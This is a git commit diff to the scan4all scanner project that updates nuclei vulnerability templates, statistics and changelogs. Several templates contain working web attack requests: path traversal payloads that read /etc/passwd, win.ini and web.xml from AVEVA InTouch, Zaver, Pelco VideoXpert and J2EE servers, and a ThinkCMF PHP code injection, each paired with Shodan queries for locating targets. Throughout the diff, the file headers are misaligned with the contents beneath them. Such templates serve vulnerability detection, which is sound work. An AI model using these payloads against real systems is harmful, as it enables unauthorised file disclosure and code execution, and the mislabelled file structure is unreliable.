up 2022-09-13

Author: hktalent

README.md

@@ -172,6 +172,7 @@ priorityNmap=false ./scan4all -tp http -list allOut.txt -v
 more see: <a href=https://github.com/hktalent/scan4all/discussions>discussions</a>
 
 # Changelog
+- 2022-07-28 Added substr and aes_cbc dsl helper by me <a href="https://github.com/projectdiscovery/nuclei/releases/tag/v2.7.7">nuclei v2.7.7</a>
 - 2022-07-20 fix and PR nuclei <a href=https://github.com/projectdiscovery/nuclei/issues/2301>#2301</a> 并发多实例的bug
 - 2022-07-20 add web cache vulnerability scanner
 - 2022-07-19 PR nuclei <a href=https://github.com/projectdiscovery/nuclei/pull/2308>#2308</a> add dsl function: substr aes_cbc

README_CN.md

@@ -205,6 +205,7 @@ priorityNmap=false ./scan4all -tp http -list allOut.txt -v
 more see: <a href=https://github.com/hktalent/scan4all/discussions>discussions</a>
 
 # 变更日志
+- 2022-07-28 为 nuclei 添加 substr、 aes_cbc DSL 函数<a href="https://github.com/projectdiscovery/nuclei/releases/tag/v2.7.7">nuclei v2.7.7</a>
 - 2022-08-03 fixed nuclei Multiple instances cache goroutine leaks PR<a href=https://github.com/projectdiscovery/nuclei/issues/2386>#2386</a>
 - 2022-07-20 fix and PR nuclei <a href=https://github.com/projectdiscovery/nuclei/issues/2301>#2301</a> 并发多实例的bug
 - 2022-07-20 add web cache vulnerability scanner

config/nuclei-templates/README.md

@@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
 
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |  1414 | daffainfo     |   630 | cves             |  1389 | info     |  1463 | http    |  3823 |
-| panel     |   649 | dhiyaneshdk   |   577 | exposed-panels   |   656 | high     |  1000 | file    |    76 |
-| edb       |   557 | pikpikcu      |   326 | vulnerabilities  |   510 | medium   |   811 | network |    51 |
-| lfi       |   500 | pdteam        |   269 | technologies     |   280 | critical |   475 | dns     |    17 |
-| xss       |   486 | geeknik       |   187 | exposures        |   273 | low      |   221 |         |       |
-| wordpress |   417 | dwisiswant0   |   169 | misconfiguration |   231 | unknown  |    10 |         |       |
-| exposure  |   404 | 0x_akoko      |   162 | token-spray      |   230 |          |       |         |       |
-| cve2021   |   350 | princechaddha |   150 | workflows        |   189 |          |       |         |       |
-| rce       |   335 | ritikchaddha  |   135 | default-logins   |   102 |          |       |         |       |
-| wp-plugin |   314 | pussycat0x    |   133 | file             |    76 |          |       |         |       |
-
-**295 directories, 4195 files**.
+| cve       |  1430 | daffainfo     |   631 | cves             |  1407 | info     |  1474 | http    |  3858 |
+| panel     |   655 | dhiyaneshdk   |   584 | exposed-panels   |   662 | high     |  1009 | file    |    76 |
+| edb       |   563 | pikpikcu      |   329 | vulnerabilities  |   509 | medium   |   818 | network |    51 |
+| lfi       |   509 | pdteam        |   269 | technologies     |   282 | critical |   478 | dns     |    17 |
+| xss       |   491 | geeknik       |   187 | exposures        |   275 | low      |   225 |         |       |
+| wordpress |   419 | dwisiswant0   |   169 | misconfiguration |   237 | unknown  |    11 |         |       |
+| exposure  |   407 | 0x_akoko      |   165 | token-spray      |   230 |          |       |         |       |
+| cve2021   |   352 | princechaddha |   151 | workflows        |   189 |          |       |         |       |
+| rce       |   337 | ritikchaddha  |   137 | default-logins   |   103 |          |       |         |       |
+| wp-plugin |   316 | pussycat0x    |   133 | file             |    76 |          |       |         |       |
+
+**296 directories, 4231 files**.
 
 </td>
 </tr>

config/nuclei-templates/TEMPLATES-STATS.json

@@ -1,12 +1,12 @@
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |  1414 | daffainfo     |   630 | cves             |  1389 | info     |  1463 | http    |  3823 |
-| panel     |   649 | dhiyaneshdk   |   577 | exposed-panels   |   656 | high     |  1000 | file    |    76 |
-| edb       |   557 | pikpikcu      |   326 | vulnerabilities  |   510 | medium   |   811 | network |    51 |
-| lfi       |   500 | pdteam        |   269 | technologies     |   280 | critical |   475 | dns     |    17 |
-| xss       |   486 | geeknik       |   187 | exposures        |   273 | low      |   221 |         |       |
-| wordpress |   417 | dwisiswant0   |   169 | misconfiguration |   231 | unknown  |    10 |         |       |
-| exposure  |   404 | 0x_akoko      |   162 | token-spray      |   230 |          |       |         |       |
-| cve2021   |   350 | princechaddha |   150 | workflows        |   189 |          |       |         |       |
-| rce       |   335 | ritikchaddha  |   135 | default-logins   |   102 |          |       |         |       |
-| wp-plugin |   314 | pussycat0x    |   133 | file             |    76 |          |       |         |       |
+| cve       |  1430 | daffainfo     |   631 | cves             |  1407 | info     |  1474 | http    |  3858 |
+| panel     |   655 | dhiyaneshdk   |   584 | exposed-panels   |   662 | high     |  1009 | file    |    76 |
+| edb       |   563 | pikpikcu      |   329 | vulnerabilities  |   509 | medium   |   818 | network |    51 |
+| lfi       |   509 | pdteam        |   269 | technologies     |   282 | critical |   478 | dns     |    17 |
+| xss       |   491 | geeknik       |   187 | exposures        |   275 | low      |   225 |         |       |
+| wordpress |   419 | dwisiswant0   |   169 | misconfiguration |   237 | unknown  |    11 |         |       |
+| exposure  |   407 | 0x_akoko      |   165 | token-spray      |   230 |          |       |         |       |
+| cve2021   |   352 | princechaddha |   151 | workflows        |   189 |          |       |         |       |
+| rce       |   337 | ritikchaddha  |   137 | default-logins   |   103 |          |       |         |       |
+| wp-plugin |   316 | pussycat0x    |   133 | file             |    76 |          |       |         |       |

config/nuclei-templates/TEMPLATES-STATS.md

@@ -9,6 +9,16 @@
             "email": ""
         }
     },
+    {
+        "author": "0x08",
+        "links": {
+            "github": "https://github.com/its0x08",
+            "twitter": "",
+            "linkedin": "",
+            "website": "",
+            "email": ""
+        }
+    },
     {
         "author": "Dhiyaneshwaran",
         "links": {

config/nuclei-templates/TOP-10.md

@@ -0,0 +1,40 @@
+id: CVE-2022-23854
+
+info:
+  name: AVEVA InTouch Access Anywhere Secure Gateway - Path Traversal
+  author: For3stCo1d
+  severity: high
+  description: |
+    AVEVA Group plc is a marine and plant engineering IT company headquartered in Cambridge, England. AVEVA software is used in many sectors, including on- and off-shore oil and gas processing, chemicals, pharmaceuticals, nuclear and conventional power generation, nuclear fuel reprocessing, recycling and shipbuilding (https://www.aveva.com).
+  reference:
+    - https://packetstormsecurity.com/files/cve/CVE-2022-23854
+    - https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854
+  classification:
+    cve-id: CVE-2022-23854
+  metadata:
+    verified: true
+    shodan-query: http.html:"InTouch Access Anywhere"
+  tags: lfi,packetstorm,cve,cve2022,aveva,intouch
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'for 16-bit app support'
+          - 'extensions'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - EricomSecureGateway
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/contributors.json

@@ -3,14 +3,19 @@ id: CVE-2022-37299
 info:
   name: Shirne CMS 1.2.0. - Path Traversal
   author: pikpikcu
-  severity: critical
+  severity: medium
   description: Shirne CMS 1.2.0 There is a Path Traversal vulnerability which could cause arbitrary file read via /static/ueditor/php/controller.php
   reference:
     - https://twitter.com/pikpikcu/status/1568316864690028544
     - https://nvd.nist.gov/vuln/detail/CVE-2022-37299
     - https://gitee.com/shirnecn/ShirneCMS/issues/I5JRHJ?from=project-issue
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 6.5
+    cve-id: CVE-2022-37299
+    cwe-id: CWE-22
   metadata:
-    verified: true
+    verified: "true"
   tags: cve,cve2022,shirnecms,lfi
 
 requests:

config/nuclei-templates/cves/2022/CVE-2022-23854.yaml

@@ -0,0 +1,34 @@
+id: CVE-2022-38794
+
+info:
+  name: Zaver - Local File Inclusion
+  author: pikpikcu
+  severity: high
+  description: |
+    Zaver through 2020-12-15 allows directory traversal via the GET /.. substring.
+  reference:
+    - https://github.com/zyearn/zaver/issues/22
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38794
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-38794
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-38794
+    cwe-id: CWE-22
+  tags: cve,cve2022,lfi,zaver
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/../../../../../../../../etc/passwd'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-37299.yaml

@@ -0,0 +1,27 @@
+id: ccm-detect
+info:
+  name: ClearCom Core Configuration Manager (CCM) Detect
+  author: failOpen
+  severity: info
+  reference:
+    - https://www.clearcom.com/DownloadCenter/manuals/FreeSpeakII_Online_Manual/UserGuide/Content/Base/CCM/CCM.htm
+  metadata:
+    verified: true
+    shodan-query: http.html:"CCM - Authentication Failure"
+  tags: panel,clearcom,ccm
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "CCM - Authentication Failure"
+
+      - type: status
+        status:
+          - 401

config/nuclei-templates/cves/2022/CVE-2022-38794.yaml

@@ -0,0 +1,26 @@
+id: corebos-panel
+
+info:
+  name: CoreBos - Panel
+  author: arafatansari
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"corebos"
+  tags: panel,corebos
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Powered by coreBOS'
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposed-panels/ccm-detect.yaml

@@ -1,44 +1,45 @@
-id: generic-j2ee-lfi
-
-info:
-  name: Generic J2EE LFI scan
-  author: davidfegyver
-  severity: high
-  description: Looks for J2EE specific LFI vulnerabilities, tries to leak the web.xml file.
-  reference:
-    - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LFIModule.java
-  metadata:
-    verified: true
-    shodan-query: http.title:"J2EE"
-  tags: lfi,generic,j2ee
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/../../../../WEB-INF/web.xml"
-      - "{{BaseURL}}/../../../WEB-INF/web.xml"
-      - "{{BaseURL}}/../../WEB-INF/web.xml"
-      - "{{BaseURL}}/%c0%ae/%c0%ae/WEB-INF/web.xml"
-      - "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
-      - "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
-      - "{{BaseURL}}/../../../WEB-INF/web.xml;x="
-      - "{{BaseURL}}/../../WEB-INF/web.xml;x="
-      - "{{BaseURL}}/../WEB-INF/web.xml;x="
-      - "{{BaseURL}}/WEB-INF/web.xml"
-      - "{{BaseURL}}/.//WEB-INF/web.xml"
-      - "{{BaseURL}}/../WEB-INF/web.xml"
-      - "{{BaseURL}}/%c0%ae/WEB-INF/web.xml"
-
-    stop-at-first-match: true
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "<servlet-name>"
-          - "</web-app>"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+id: generic-j2ee-lfi
+
+info:
+  name: Generic J2EE LFI scan
+  author: davidfegyver
+  severity: high
+  description: Looks for J2EE specific LFI vulnerabilities, tries to leak the web.xml file.
+  reference:
+    - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LFIModule.java
+    - https://gist.github.com/harisec/519dc6b45c6b594908c37d9ac19edbc3
+  metadata:
+    verified: true
+    shodan-query: http.title:"J2EE"
+  tags: lfi,generic,j2ee
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/../../../../WEB-INF/web.xml"
+      - "{{BaseURL}}/../../../WEB-INF/web.xml"
+      - "{{BaseURL}}/../../WEB-INF/web.xml"
+      - "{{BaseURL}}/%c0%ae/%c0%ae/WEB-INF/web.xml"
+      - "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
+      - "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
+      - "{{BaseURL}}/../../../WEB-INF/web.xml;x="
+      - "{{BaseURL}}/../../WEB-INF/web.xml;x="
+      - "{{BaseURL}}/../WEB-INF/web.xml;x="
+      - "{{BaseURL}}/WEB-INF/web.xml"
+      - "{{BaseURL}}/.//WEB-INF/web.xml"
+      - "{{BaseURL}}/../WEB-INF/web.xml"
+      - "{{BaseURL}}/%c0%ae/WEB-INF/web.xml"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<servlet-name>"
+          - "</web-app>"
+        condition: and
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposed-panels/corebos-panel.yaml

@@ -6,22 +6,18 @@ info:
   severity: high
   reference:
     - https://www.shuzhiduo.com/A/l1dygr36Je/
-  tags: thinkcmf
+  tags: thinkcmf,rce
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=<?php%20phpinfo();"
+      - "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=<?php%20echo%20md5('ThinkCMF');"
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "PHP Extension"
-          - "PHP Version"
-          - "PHP License"
-          - "PHP Variables"
-        condition: and
+          - "d9b2c63a497e2f30c4ad9ad083a00691"
 
       - type: status
         status:

config/nuclei-templates/vulnerabilities/generic/generic-j2ee-lfi.yaml

@@ -0,0 +1,32 @@
+id: videoxpert-lfi
+
+info:
+  name: Schneider Electric Pelco VideoXpert Core Admin Portal - Directory Traversal
+  author: 0x_akoko
+  severity: high
+  description: Pelco VideoXpert suffers from a directory traversal vulnerability. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.
+  reference:
+    - https://packetstormsecurity.com/files/143317/Schneider-Electric-Pelco-VideoXpert-Core-Admin-Portal-Directory-Traversal.html
+    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
+  metadata:
+    shodan-query: title:"VideoXpert"
+  tags: schneider,pelco,packetstorm,lfi,videoxpert
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'bit app support'
+          - 'fonts'
+          - 'extensions'
+        condition: and
+
+      - type: status
+        status:
+          - 200